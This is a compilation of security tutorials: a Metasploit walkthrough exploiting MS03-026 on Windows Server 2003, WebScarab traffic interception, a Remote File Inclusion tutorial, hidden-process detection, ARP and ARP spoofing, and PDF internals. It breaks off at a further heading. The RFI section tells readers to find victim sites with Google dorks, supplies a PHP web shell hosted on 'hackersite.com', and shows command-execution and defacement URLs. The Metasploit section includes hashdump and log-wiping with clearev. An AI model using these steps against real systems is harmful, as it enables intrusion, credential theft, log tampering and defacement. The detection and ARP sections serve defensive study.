Penetration Testing with Metasploit Framework - Author: Dinesh Shetty

Contents

Introduction Working with Metasploit Pen Testing using Metasploit Summary References Conclusion

Introduction

When I say "Penetration Testing tool" the first thing that comes to your mind is the world's largest Ruby project, with over 700,000 lines of code 'Metasploit' [Reference 1]. No wonder it had become the de-facto standard for penetration testing and vulnerability development with more than one million unique downloads per year and the world's largest, public database of quality assured exploits. The Metasploit Framework is a program and sub-project developed by Metasploit LLC. It was initially created in 2003 in the Perl programming language, but was later completely re-written in the Ruby Programming Language. With the most recent release (3.7.1) Metasploit has taken exploit testing and simulation to a complete new level which has muscled out its high priced commercial counterparts by increasing the speed and lethality of code of exploit in shortest possible time.

In this article, I will walk your through detailed step by step sequence of commands along with graphical illustrations to perform effective penetration testing using Metasploit framework.

Working with Metasploit

Metasploit is simple to use and is designed with ease-of-use in mind to aid Penetration Testers. Metasploit Framework follows these common steps while exploiting a any target system

Select and configure the exploit to be targeted. This is the code that will be targeted toward a system with the intention of taking advantage of a defect in the software.Validate whether the chosen system is susceptible to the chosen exploit.. lect and configure a payload that will be used. This payload represents the code that will be run on a system after a loop-hole has been found in the system and an entry point is set.t. Select and configure the encoding schema to be used to make sure that the payload can evade Intrusion Detection Systems with ease. Execute the exploit.

I will be taking you through this demo in BackTrack 5 [Reference 2], so go ahead and download that if you don't already have it. The reason for using BackTrack 5 is that it comes with perfect setup for Metasploit and everything that Pen Testing person ever need. Metasploit framework has three work environments, the msfconsole, the msfcli interface and the msfweb interface. However, the primary and the most preferred work area is the 'msfconsole'. It is an efficient command-line interface that has its own command set and environment system. Before executing your exploit, it is useful to understand what some Metasploit commands do. Below are some of the commands that you will use most. Graphical explanation of their outputs would be given as and when we use them while exploiting some boxes in later part of the article.

search <keyword>: Typing in the command 'search' along with the keyword lists out the various possible exploits that have that keyword pattern. show exploits: Typing in the command 'show exploits' lists out the currently available exploits. There are remote exploits for various platforms and applications including Windows, Linux, IIS, Apache, and so on, which help to test the flexibility and understand the working of Metasploit. show payloads: With the same 'show' command, we can also list the payloads available. We can use a 'show payloads' to list the payloads. show options: Typing in the command 'show options' will show you options that you have set and possibly ones that you might have forgotten to set. Each exploit and payload comes with its own options that you can set. info <type> <name>: If you want specific information on an exploit or payload, you are able to use the 'info' command. Let's say we want to get complete info of the payload 'winbind'. We can use 'info payload winbind'. use <exploit_name>: This command tells Metasploit to use the exploit with the specified name. set RHOST <hostname_or_ip>: This command will instruct Metasploit to target the specified remote host. set RPORT <host_port>: This command sets the port that Metasploit will connect to on the remote host. set PAYLOAD <generic/shell_bind_tcp>: This command sets the payload that is used to a generic payload that will give you a shell when a service is exploited. set LPORT <local_port>: This command sets the port number that the payload will open on the server when an exploit is exploited. It is important that this port number be a port that can be opened on the server (i.e.it is not in use by another service and not reserved for administrative use), so set it to a random 4 digitnumber greater than 1024, and you should be fine. You'll have to change the number each time you successfully exploit a service as well. exploit: Actually exploits the service. Another version of exploit, rexploit reloads your exploit code and then executes the exploit. This allows you to try minor changes to your exploit code without restarting the console help: The 'help' command will give you basic information of all the commands that are not listed out here.

Now that you are ready with all the basic commands you need to launch your exploit, lets get in action with live target system using Metasploit.

Pen Testing using Metasploit

Here is the demonstration of pen testing a vulnerable target system using Metasploit with detailed steps.

Victim Machine OS: Microsoft Windows Server 2003 IP: IP: 192.168.42.129

Attacker (Our) Machine OS: Backtrack 5 Kernel version: Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux Metasploit Version: Built in version of metasploit 3.8.0-dev IP: 192.168.42.128

Our objective here is to gain remote access to given target which is known to be running vulnerable Windows 2003 Server. Here are the detailed steps of our attack in action,

Step 1

Perform an Nmap [Reference 3] scan of the remote server 192.168.42.129 The output of the Nmap scan shows us a range of ports open which can be seen below in Figure 1

We notice that there is port 135 open. Thus we can look for scripts in Metasploit to exploit and gain shell access if this server is vulnerable.

Step 2:

Now on your BackTrack launch msfconsole as shown below

Application > BackTrack > Exploitation Tools > Network Exploit Tools > Metasploit Framework > msfconsole

During the initialization of msfconsole, standard checks are performed. If everything works out fine we will see the welcome screen as shown

Step 3:

Now, we know that port 135 is open so, we search for a related RPC exploit in Metasploit. To list out all the exploits supported by Metasploit we use the "show exploits" command. This exploit lists out all the currently available exploits and a small portion of it is shown below

As you may have noticed, the default installation of the Metasploit Framework 3.8.0-dev comes with 696 exploits and 224 payloads, which is quite an impressive stockpile thus finding a specific exploit from this huge list would be a real tedious task. So, we use a better option. You can either visit the link http://metasploit.com/modules/ or another alternative would be to use the "search <keyword>""command in Metasploit to search for related exploits for RPC.command in Metasploit to search for related exploits for RPC. In msfconsole type "search dcerpc" to search all the exploits related to dcerpc keyword as that exploit can be used to gain access to the server with a vulnerable port 135. A list of all the related exploits would be presented on the msfconsole window and this is shown below in figure 5.

Step 4:

Now that you have the list of RPC exploits in front of you, we would need more information about the exploit before we actually use it. To get more information regarding the exploit you can use the command,  "info exploit/windows/dcerpc/ms03_026_dcom"

This command provides information such as available targets, exploit requirements, details of vulnerability itself, and even references where you can find more information. This is shown in screenshot below,

Step 5:

The command "use <exploit_name>" activates the exploit environment for the exploit <exploit_name>. In our case we will use the following command to activate our exploit "use exploit/windows/dcerpc/ms03_026_dcom"

From the above figure we can see that, after the use of the exploit command the prompt changes from "msf>" to "msf exploit(ms03_026_dcom) >" which symbolizes that we have entered a temporary environment of that exploit.

Step 6:

Now, we need to configure the exploit as per the need of the current scenario. The "show options" command displays the various parameters which are required for the exploit to be launched properly. In our case, the RPORT is already set to 135 and the only option to be set is RHOST which can be set using the "set RHOST" command. We enter the command "set RHOST 192.168.42.129" and we see that the RHOST is set to 192.168.42.129

Step 7:

The only step remaining now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command. As shown in the below figure, "show payloads" command will list all payloads that are compatible with the selected exploit.

For our case, we are using the reverse tcp meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" which spawns a shell if the remote server is successfully exploited. Now again you must view the available options using "show options" to make sure all the compulsory sections are properly filled so that the exploit is launched properly.

We notice that the LHOST for out payload is not set, so we set it to out local IP ie. 192.168.42.128 using the command "set LHOST 192.168.42.128"

Step 8:

Now that everything is ready and the exploit has been configured properly its time to launch the exploit. You can use the "check" command to check whether the victim machine is vulnerable to the exploit or not. This option is not present for all the exploits but can be a real good support system before you actually exploit the remote server to make sure the remote server is not patched against the exploit you are trying against it. In out case as shown in the figure below, our selected exploit does not support the check option.

The "exploit" command actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system.

The above figure shows that the exploit was successfully executed against the remote machine 192.168.42.129 due to the vulnerable port 135. This is indicated by change in prompt to "meterpreter >".

Step 9:

Now that a reverse connection has been setup between the victim and our machine, we have complete control of the server. We can use the "help" command to see which all commands can be used by us on the remote server to perform the related actions as displayed in the below figure.

Below are the results of some of the meterpreter commands.

"ipconfig" prints the remote machines all current TCP/IP network configuration values "getuid" prints the server's username to he console. "hashdump" dumps the contents of the SAM database. "clearev" can be used to wipe off all the traces that you were ever on the machine.

Summary

Thus we have successfully used Metasploit framework to break into the remote Windows 2003 server and get shell access which can be used to control the remote machine and perform any kind of operations. Here are potential uses of the Metasploit Framework

Metasploit can be used during penetration testing to validate the reports by other automatic vulnerability assessment tools to prove that the vulnerability is not a false positive and can be exploited. Care has to taken because not only does it disprove false positives, but it can also breaks things. Metasploit can be used to test the new exploits that come up nearly everyday on your locally hosted test servers to understand the effectiveness of the exploit. Metasploit is also a great testing tool for your intrusion detection systems to test whether the IDS is successful in preventing the attacks that we use to bypass it.

References

Metasploit - Popular Penetration Testing Framework BackTrack - Dedicated live OS distribution for Penetration Testing. Nmap - Free Security Scanner For Network Exploration & Hacking

Conclusion

This article presented high level overview of using Metasploit for penetration testing with example of exploiting RPC vulnerability in remote Windows 2003 server. Armed with this basic knowledge along with more research, you can create your own exploits and perform Penetration Testing like never before.

Hacking Web Applications using WebScarab - Author: Abhinav_Singh

Contents

Introduction Setting up WebScarab Intercepting Web Traffic Conclusion References

Introduction

In this short tutorial, we will see how to use WebScarab [Reference 1] to easily and transparently intercept web traffic. This is one of the basic step in web application hacking and analysis of web security. Even casual hackers can use it to see what goes behind the screen while you browse particular website.

WebScarab is a framework for analysing web applications by operating as intercepting proxy, allowing the user to review and modify HTTP requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser. WebScarab is able to intercept both HTTP and HTTPS communication. This makes it one of the powerful tool when it comes to web application security. Here we will see how to setup WebScarab and then use it to intercept & analyze web traffic.

Setting up WebScarab

Before we proceed with actual game, you need to download and install the WebScarab [Reference 1]. After you have installed the setup you will first have to setup your browser so that WebScarab can act as proxy server. I am taking the example of Firefox here but similar steps will apply to other web browsers also.

Here are the steps

Go to options => Advanced -> Network -> Settings. You will see the dialog as shown in the above screenshot.  Then select the Manual Proxy configuration  Now enter the following values. HTTP proxy - 127.0.0.1 and port - 8008

This sets the WebScarab to intercept any web request by acting as a local proxy.

Intercepting Web Traffic

Now time for real game, start your WebScarab & you will see the screen as shown below.

In the intercept tab, select "Intercept request" and in the left hand side menu select "Get" and "Post" options. WebScarab is now completely ready to intercept the HTTP Get and post requests. Next, launch your browser & type any URL for example, http://google.com. You will see a window in WebScarab that will show the intercepted HTTP Get request as shown below. At this point you can also click on the "Intercept Response" button so that it can also intercept the response that is coming back from the Google web server.

That is how simple it is. You can use this technique to analyze any web request and response going in and out of your browser. But the real power of WebScarab lies in manipulating these request and responses on the fly. Let me tell you this can be very very deadly. If you are able to make the right moves and changes in the HTTP request headers then you can easily modify the headers to send invalid values to the servers. This is very useful in web application penetration testing. At the end, you can click on the "Summary" tab in the main window of the WebScarab which shows complete details of all the intercepted requests and response as shown in the screen below.

Conclusion

In this startup guide, you have seen how to use WebScarab to intercept the HTTP traffic and analyse them. Rest is upto you how far you can take it.

References

WebScarab - Framework for Intercepting & Manipulating Web Traffic

Remote File Inclusion Tutorial

Contents

Introduction Starting with RFI Conclusion

Introduction

RFI stands for Remote File Inclusion that allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, I suppose you will know what it is all about and may be able to deploy an attack or two. RFI is a common vulnerability and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything. What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux.

Starting with RFI

Lets get it started. The first step is to find vulnerable site, you can easily find them using Google dorks.If you don't have any idea, you might want to read about advanced password hacking using Google dorks or to use automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website

http://victimsite.com/index.php?page=home

As you can see, this website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses PHP include function to pull them out. Lets check it out.

http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt

I have included a custom script "evilscript" in text format from my website, which contains some code.Now, if its a vulnerable website, then any of these 3 things can happen

Case 1 - You might have noticed that the url consisted of "page=home" had no extension, but I have included an extension in my url,hence the site may give an error like 'failure to include evilscript.txt.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server. Case 2 - In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error. Case 3 - successfull execution :)

Now once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this knowledge of PHP might come in handy. Here we go

<?php echo "<script>alert(U 4r3 0wn3d !!);</script>"; echo "Run command: ".htmlspecialchars($_GET['cmd']); system($_GET['cmd']); ?>

The above code allows you to exploit include function and tests if the site if RFI (XSS) vulnerable by running the alert box code and if successful, you can send custom commands to the linux server in bash. So, if you are in luck and if it worked, lets try our hands on some Linux commands. For example to find the current working directory of server and then to list files, we will be using 'pwd' and 'ls' commands

http//victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript http//victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript

What it does is that it sends the command as cmd we put in our script and begins print the working directory and list the documents.Even better you can almost make the page proclaim that you hacked it by using the 'echo' command.

cmd=echo U r pwn3d by xero> index.php

It will then re-write the index.php and render it.In case, its a primitive website which stores pages with .txt extension, you might want to put it with along the .txt files. Now as expected, we are now the alpha and the omega of the website :) we can download, remove, rename, anything! Want to download stuff ? try the 'wget' function... I leave the rest to your creativity !

Conclusion

In this basic tutorial, Rishabh explains about RFI vulnerability and how to play around with it.

Uncovering Hidden Processes on Windows System

The Real Problem

When you start your PC, lot of processes will be running. Some processes run by default and some are started by you. As you keep installing more and more software's, the process list goes bigger and bigger. Some day it reaches the stage where in it gets difficult to manage those processes and in between if some spyware come and sit on your machine, you can't make out easily until some really bad thing happens.

Detection Tools

Here I will throw some light on various methods of detecting spyware or any malicious programs running on the computer, starting from basic to advanced level. Usually startup programs are managed through various registry settings. If you are an expert, then you can edit these registry settings yourself. You can find a good list of startup registry locations here. Below are the some of very useful tools which can either be used alone or in combination with others.

1.MSConfig The 'msconfig' tool comes with Windows. It not only shows you list of processes which are started by default when you start your computer but also allows you to modify execution of startup processes. 2.HijackThis This is very good tool which shows all startup entries (processes, BHOs, services..etc) from non-windows applications. This way you can easily find out and knock off suspicious processes.   3.Autoruns One more good tool is Autoruns from Sysinternals. This tool shows all startup entries (processes, services, drivers, Winlogon notify entries, winsock providers etc). Also you can make it to display non-microsoft entries by selecting "Hide microsoft entries" from the options menu.   4.Process Explorer You can use the 'Process Explorer' from SysInternals.com to find out more detailed information about all the running processes. Once you find the process or DLL, you wants to know if its really spyware or any kind of malware programs. You can find out this by connecting to ProcessLibrary.com. This website provides information about a process or DLL to make out if its legitimate process or not. By the way you can always use Google to find out more information about any suspicious looking process. 5.BHORemover BHO stands for 'Browser Helper Objects' which are the plugins written for Internet Explorer to enhance its capabilities. But this feature is being misused by many spyware programs which monitor user's browsing habits and also steal the online credentials silently. To eliminate such BHO's from the computer, I have written a tool called BHORemover which scans and lists all installed BHO's on the system with detailed information. This helps in identifying malicious programs and remove them from the system.   6.WinServiceManager WinServiceManager provides single point of administration for managing various aspects of Windows services. It has got more features and provides better management functionality than built-in Windows service management console. It shows list of non-windows services which allows the user to quickly identify and remove the additional services, most of these are installed by spyware to monitor the activities.   7.RemoteDLL Some of the spywares use the DLLs to monitor and control their life cycle. Usually these DLL's are injected into windows processes such as explorer.exe, winlogon.exe etc to hide their presence. You can remove these DLL's from the process using the RemoteDLL tool.   8.Anti Rootkits All the above mentioned tools are the basic ones to find out more information about running programs. But there are more stealth programs such as rootkits which cannot be detected by normal programs. You need more sophisticated tools to view those programs. There are couple of rootkit detection tools such as BlackLight from F-Secure, Mcafee's Rootkit Detective, Rootkit Revealer from SysInternals.com and IceSword by PJF. IceSword is very advanced tool among all and it shows all hidden processes, services, drivers, SSDT hooks, messages hooks etc.

Conclusion

Antivirus or Antispyware applications can't always protect you from new malicious programs. You need to defend on your own to protest your own system from these programs. Hope this article has enlightened you to some extent in that direction.

References

1. HijackThis: Remove the hijacked entries from the system.

2. Autoruns: System startup entries enumerator and eliminator.

3. Process Explorer: Dispalys process details including loaded modules.

4. BHO Remover: Scans and removes installed BHO's from the system.

5. WinServiceManager: Manage Windows services at one point

6. RemoteDLL: Tool to inject or remove the DLL from process

7. BlackLight: Light rootkit detecttior from F-Secure.

8. IceSword: Advanced rootkit detection tool.

9. Rootkit Detective: Rootkit detection tool from McAfee.

10.Rootkit Revealer: Sysinternal's rootkit detection tool.

11.IceSword & Rootkit : Using IceSword to detect rootkits.

Tutorial on Basics of NIC, MAC and ARP - Author: Abhinav_Singh

Contents

Introduction Know the Terms - IP Address, NIC, MAC Why do we need IP when we have MAC ? Lets bring up ARP Conclusion

Introduction

In this beginners guide, I am going to explain the basic & important terms of computer networks such as NIC, IP Address, MAC & ARP. This will greatly help you set up your network basics right before you look for advanced stuff.

Often we straight away jump into using tools and learn quickly from the various technical papers but we tend to forget the basics. This often causes us to lose the ground and eventually lose interest in the same. From that perspective, this tutorial will help you get your ground stable on network basics and get going !

Know the Terms - IP Address, NIC, MAC

You must be familiar with the term IP address. Just like your home has a mailing address in the same way any computer or device connected to the internet have a mailing address called the IP address. It can either be static or dynamic. In case its static then it will remain unchanged every time you connect to a network and if its dynamic then a local DHCP server grants you a new IP address every time you connect to internet. So with machines coming and going on networks, and IP addresses ever changing, how do other computers on your network find Redbeard? The secret (well, not really a secret; just a fact that veteran administrators know so well, they forgot to tell you) is this: every networked device actually has two addresses. One is the IP address, which might or might not change. The other is the MAC address, which is fixed to the device (can be changed too, read more here). When you connect a computer to your Ethernet LAN, do you know what you're plugging the Ethernet cable into? From the outside, it looks like you're plugging it into a metal case, but you're not. Inside the case is a Network Interface Card (NIC). A NIC is a special hardware card within any networked device (computer, printer, router, etc.) that handles all the technical aspects of sending and receiving data packets over a computer network. Like your mailing address at home, your computer's NIC has a unique address. This address must be unique, otherwise, network traffic cannot find its way to the right computer. The distinctive address that identifies a NIC is called the Media Access Control (MAC) address. A MAC address is formatted as a six-byte, hexadecimal number, like this

00:90:7F:12:DE:7F

A MAC address is a unique character string, and since it identifies a specific physical device -- one individual NIC -- the MAC address, by convention, never changes for the life of the NIC. Two NICs never have the same MAC address (unless some manufacturer screws up royally [which has happened]). Because your NIC's MAC address is permanent, it's often referred to as the "real" or physical address of a computer.

Why do we need IP when we have MAC?

Actually MAC address are fixed hence they are not as scalable compared to IP address. IP address have several other features like subnetting and supernetting which gives a logical understanding of the presence of a machine in a network. These facilities are not with the MAC address. Also MAC address are not routable. The Internet Protocols will not treat them as an address of a source or destination. Hence IP address in many ways simplifies our task. The malleable IP address gives your network some flexible manageability. The never-changing MAC provides a specific, reliable address for a physical device. Or you could say, we have the long and the short of it. IP addresses route a packet across the whole global Internet, while MAC addresses help the packet make the small, local hop between hardware devices. Sophisticated networking is possible because each of your networked devices has both a MAC and an IP address. With that comes the next question, How MAC and IP co-ordinate?

Lets bring up ARP

The simple definition that we study in local networking books about ARP is - network layer protocol that is used to convert IP address into MAC address. Lets get into more details, We began by wondering, "How do devices on a local network become aware of one another?" NICs and MACs are important pieces of the answer, but your network must learn to pair a MAC address with the IP address for the same machine. It does so using a technique called Address Resolution Protocol (in short ARP). Think of ARP as network roll call. Remember the first day of your college/school? At the beginning of class, the teacher called from a list of names, expecting you to reply when she called yours. She did this to associate your name with your face. Every student heard every name, but answered only to his or her own name. ARP uses a similar technique to associate an IP address to the MAC address. Let's assign Abhinav the IP address, 192.168.39.101, and suppose his NIC has the MAC address, 00:A0:24:30:2E:13. And suppose he need to send a file to Jaya or more literally, to her computer. When Abhinav attempts to send jaya a file, Abhinav first obtains Jaya's IP address. Upon seeing that the IP address is local (on the same subnetwork), Abhinav knows he is capable of sending the file to her destination, if he learns the "real" (MAC) address associated with that IP address. To learn the MAC address, Abhinav does what your teacher did on the first day of school/college. He calls out to the entire local network asking that the computer with the IP in question reply "Here!" with a MAC address. Let's say that Jaya has the IP, 192.168.39.148. To find the MAC address for Jaya, Abhinav would send the following (simplified) ARP request:

From: (Abhinav's MAC address) To: (Broadcast address) Packet Content 00:A0:24:30:2E:13 FF:FF:FF:FF:FF:FF Who has 192.168.39.148? Tell 192.168.39.101.

Notice the special address in the "To" field above. That special address (all Fs) is the MAC broadcast address. Anything sent to that address goes to every computer on LAN segment. All those computers receive the message, but ignore it, because it doesn't pertain to them -- with the exception of Jaya. Because Jaya is 192.168.39.148, she replies with her MAC address, like this:

From: (Jaya's MAC address) To: (Abhinav's MAC address) Packet Content 00:A0:24:30:4C:23 00:A0:24:30:2E:13 I have 192.168.39.148

This is how Abhinav will finally succeed in finally sending his file (not a love letter) to Jaya after identifying her MAC or physical address. In short Abhinav ARPed Jaya. Here is a picture to demonstrate this process.

Having successfully ARPed, Abhinav stashes the newly-learned MAC/IP pair in an ARP cache. The ARP cache is a small segment of memory your computer reserves to temporarily store a table of MAC addresses and their associated IP addresses. Your computer keeps this table for efficiency so that it doesn't have to keep broadcasting ARP requests to computers it has already queried. If Abhinav need to send something else to Jaya soon (maybe a love letter this time), Abhinav will obtain Jaya's MAC address from his own ARP cache rather than querying it again.

Conclusion

Hope this tutorial will help you to clear most of your doubts on networks basics. When you have sound basics, you can easily solve bigger problems.

Contents

Introduction ARP Spoofing/Flooding/Poisoning Detection & Mitigation ARP Spoofing Demonstration References Conclusion

Introduction

In the previous article "Tutorial on Basics of NIC, MAC and ARP" [Reference 1], I wrote about some of the basic network terms NIC, IP Address, MAC & ARP etc.

Here I will explain in depth about ARP Spoofing, how it can be used to perform local sniffing and possible solutions to protect against such attacks.

ARP Spoofing/Flooding/Poisoning

ARP Spoofing is one of the predominent attacks executed in local network. This attack involves sending fake or spoofed ARP messages onto a LAN. It is possible to update a host's ARP cache with false information via spoofed ARP Replies. This technique is known as 'ARP Poisoning' and is the basis of more complex attacks. The most dangerous amongst them is Sniffing . Poisoning can also help in causing DoS type of attack too but here we will primilarly focus on Sniffing the network data. Sniffing is the term used to describe the reading of all packets on a network segment. This is relatively easy on a network connected via a hub as ethernet is a broadcast medium and the attacker would only have to place his NIC in promiscuous mode to 'sniff' all traffic on that network segment. In a switched network this is not possible. This is because a switch builds a table of MAC addresses and their associated ports when the switch is powered on. When a host transmits an ethernet frame the switch examines the destination MAC address and routes the frame to the associated port as given in the switch table. Therefore it is not possible to sniff any traffic on the network. There are two methods to sniff traffic in a switched environment using ARP Poisoning. The first is for the attacker to send flood of spoofed ARP Replies to the switch. The switch will process these replies, updating its routing table. If this is done at a rapid rate the switches table will overflow and the switch will default to broadcast all traffic to all ports like Hub. The attacker can now 'sniff' all network traffic.

The second method involves a 'man in the middle' (MITM) style attack. I will explain this technique in detail by aid of an example. Below is a simple network segment with three hosts in a switched environment. The attacker wishes to sniff all traffic that A sends to B and visa versa. This is currently not possible as the attacker is connected to the network via a switch. The correct IP addresses and MAC addresses for each host are as follows:

Host IP Address MAC Address Host A 192.168.0.2 00:00:00:00:00:02 Host B 192.168.0.3 00:00:00:00:00:03 Attacker 192.168.0.4 00:00:00:00:00:04

Firstly the Attacker will poison A's ARP cache with a spoofed ARP Reply. The ARP reply will tell A that the IP address of B now has a MAC address of 00:00:00:00:00:04. Once A has processed the ARP Reply its ARP cache will look like this:

Host IP Address MAC Address Host A 192.168.0.2 00:00:00:00:00:02 Host B 192.168.0.3 00:00:00:00:00:04 Attacker 192.168.0.4 00:00:00:00:00:04

Secondly the Attacker will poison B's ARP cache with a spoofed ARP Reply. The ARP reply will tell B that the IP address of A now has a MAC address of 00:00:00:00:00:04. Once B has processed the ARP Reply its ARP cache will look like this:

Host IP Address MAC Address Host A 192.168.0.2 00:00:00:00:00:04 Host B 192.168.0.3 00:00:00:00:00:03 Attacker 192.168.0.4 00:00:00:00:00:04

Now whenever A sends B an ethernet frame the switch will route it to the attackers port, this will also be the case whenever B sends A an ethernet frame. The attacker may now 'sniff' the traffic whilst forwarding it on to its originally desired host. The thing to keep in mind here is that the attacker must perform the two way poisoning so that it can recieve the packets as well as send it to the destination. In this way the connection will always be alive between the two communicating hosts and the attack will perform successfully.

Detection & Mitigation

One of the solution to prevent ARP cache from being poisoned there by protect against ARP Spoofing, is to add static IP-MAC entries to the cache. If an ARP cache has been made static it will not process any ARP Replies received unlike a dynamic ARP cache. However this is not practical for large networks as the correct IP address to MAC address association of every host would have to be present in the cache of every host before it is made static. If one host changed its MAC address (e.g. after replacing a NIC) all hosts ARP caches would need to be updated manually. On windows, a login script could automate this process however it has been reported Windows will still accept and process ARP Replies even when the ARP cache has been made static. Other solution, is to use Intrusion Detection Systems (IDS) to detect ARP Poisoning attacks. You can also use tool, ArpWatch [Reference 2] to monitor against such ARP spoofing attacks on the local network.

ARP Spoofing Demonstration

Here is very good flash demonstration (obtained from oxid) which will help you to understand entire 'ARP Spoofing' operation.

http://www.securityxploded.com/arp-spoofing.swf

References

Tutorial on Basics of NIC, MAC and ARP ArpWatch - Tool to detect ARP Spoofing attacks on local LAN.

Conclusion

Hope this tutorial has helped to clear out the basics of ARP Spoofing, its attack vector and possible way to detect/mitigate such attacks.

PDF Overview - Peering into the Internals of PDF

Contents

Introduction Components of PDF File PDF Objects Strings Names Array Dictionary Streams Indirect Streams Filters File Structure Cross Reference Table Example Screenshots: Simple Hello World Text PDF Reference Conclusion

Introduction

Portable Document Format (PDF) is a file format for representing documents in a manner independent of the application software, hardware, and operating system used to create them and of the output device on which they are to be displayed or printed.

In this introductory article I will explain the internals of PDF document, its structures and components with examples and screenshots.  It will help you understand intrinsics of PDF document and will be more useful if you are into PDF malware analysis.

Components of PDF File

PDF syntax consists of four main components:

Objects File Structure Document Structure Content Stream

PDF Objects

A PDF file consists primarily of objects, of which there are eight types:

Boolean values, representing true or false Numbers include integer and real Strings Names Arrays, ordered collections of objects Dictionaries, collections of objects indexed by Names Streams, usually containing large amounts of data The null object denoted by keyword null

I will explain more details about each of these objects in detail in the following section.

PDF Objects -> Strings

String objects can be represented in two ways:

Literal Strings Hexadecimal Strings

Literal Strings consists of any number of characters between opening and closing parenthesis.

Example (This is a string objects) If string is too long then it can be represented using backslash as shown below (This is a very long\ String.) Hexadecimal Strings consists of hexadecimal character enclose with angel bracket Example: <A0C1D2E3F1>

Here each pair of hexadecimal defines one byte of string.

PDF Objects -> Names

A names object is uniquely defined by sequence of characters. Slash character(/) defined a name.

Example /secsavvy /SecSavvy Both are different name. /Sec#20Savvy mean Sec Savvy 20 is hexadecimal value for white space. Note: Pdf is case-sensitive.

PDF Objects -> Array

An array object is collection of objects. PDF array object can be heterogeneous. It is defined with square brackets.

Example [1 (string) /Name 3.14]

PDF Objects -> Dictionary

Dictionary object consists of pairs of objects. The first element is key and the second is value. The key must be name. A dictionary is written as a sequence of key-value pairs enclosed in double angle brackets (<< � >>).

Example << /Type /Pages /Kids [ 4 0 R ] /Count 1 >> Count is a key and 1 is value.

PDF Objects -> Streams

A stream object, like a string object, is a sequence of bytes. Stream can be of unlimited length, whereas a string is subject to an implementation limit. For this reason, objects with potentially large amounts of data, such as images and page descriptions, are represented as streams. A stream consists of a dictionary followed by zero or more bytes bracketed between the keywords stream and endstream:

dictionary stream ... Zero or more bytes ... endstream

PDF Objects -> Indirect Ones

Objects may be labeled so that they can be referred to by other objects. A labeled object is called an indirect object.

Example Consider this object obj and endobj is a keyword. 10 0 obj (SecSavvy String) endobj This object defined a string of object number 10. This object can be referred in a file by indirect reference as 10 0 R

PDF Objects -> Streams -> Filters

A filter is an optional part of the specification of a stream, indicating how the data in the stream must be decoded before it is used. For example, if a stream has an ASCIIHexDecode filter, an application reading the data in that stream will transform the ASCII hexadecimal-encoded data in the stream into binary data. For data encoded using LZW and ASCII base-85 encoding (in that order) can be decoded using the following entry in the stream dictionary: /Filter [ /ASCII85Decode /LZWDecode ]

Example1 0 obj << /Length 534 /Filter [ /ASCII85Decode /LZWDecode ]>> stream J..)6T`?p&<!J9%_[umg"B7/Z7KNXbN'S+,*Q/&"OLT'FLIDK#!n`$"<Atdi`\Vn%b%)&'cA*VnK\CJY(sF>c!Jnl@RM]WM;jjH6Gnc75idkL5]+cPZKEBPWdR>FF(kj1_R%W_d&/jS!;iuad7h?[L-F$+]]0A3Ck*$I0KZ?;<)CJtqi65XbVc3\n5ua:Q/=0$W<#N3U;H,MQKqfg1?:lUpR;6oN[C2E4ZNr8Udn.'p+?#X+1>0Kuk$bCDF/(3fL5]Oq)^kJZ!C2H1'TO]Rl?Q:&�<5&iP!$Rq;BXRecDN[IJB`,)o8XJOSJ9sDS]hQ;Rj@!ND)bD_q&C\g:inYC%)&u#:u,M6Bm%IY!Kb1+�:aAa�S`ViJglLb8<W9k6Yl\\0McJQkDeLWdPN?9A�jX*al>iG1p&i;eVoK&juJHs9%;Xomop�5KatWRT�JQ#qYuL,JD?M$0QP)lKn06l1apKDC@\qJ4B!!(5m+j.7F790m(Vj88l8Q:_CZ(Gm1%X\N1&u!FKHMB~> endstream endobj

Here is the list of standard filters

ASCIIHexDecode ASCII85Decode LZWDecode FlateDecode RunLengthDecode CCITTFaxDecode JBIG2Decode DCTDecode JPXDecode Crypt

File Structure

PDF file consists of 4 main elements:

PDF header identifying the PDF specification. A body containing the objects that make up the document contained in the file A cross-reference table containing information about the indirect objects in the file A trailer giving the location of the cross-reference table and of certain special objects within the body of the file.

Cross Reference Table

The cross-reference table contains information that permits random access to indirect objects within the file so that the entire file need not be read to locate any particular object. The table contains a one-line entry for each indirect object, specifying the location of that object within the body of the file. Each cross-reference section begins with a line containing the keyword xref. Following this line are one or more cross-reference subsections, which may appear in any order. Each cross-reference subsection contains entries for a contiguous range of object numbers. The subsection begins with a line containing two numbers separated by a space: the object number of the first object in this subsection and the number of entries in the subsection. For example, the line 0 8 introduces a subsection containing five objects numbered consecutively from 0 to 8.

xref 0 8 0000000000 65535 f 0000000009 00000 n 0000000074 00000 n 0000000120 00000 n 0000000179 00000 n 0000000364 00000 n 0000000466 00000 n 0000000496 00000 n

0000000009 is 10 digit byte offset in the case of in-use entry , giving the number of bytes from the beginning of the file to the beginning of the object. 0000000000 is the 10-digit object number of the next free object int the case of free entry

Example Screenshots: Simple Hello World Text PDF

Here are the series of screenshots which shows different parts of sample PDF document.

Reference

White paper on structure of PDF document

Conclusion

This article explains in brief internals of PDF document, its structures, components with examples and detailed screenshots.  Hope this article will help you in the malware research work revolviing around PDF documents.  Though it is enough for beginners but advanced users are advised read through reference white paper for more granular details.

Investigating Corrupt/Malicious PDF Document - Author: Ayush Anand

Contents

Introduction Requirements Starting Corrupt PDF Tracing and Fixing the Error in PDF Video Demonstration Reference Conclusion

Introduction

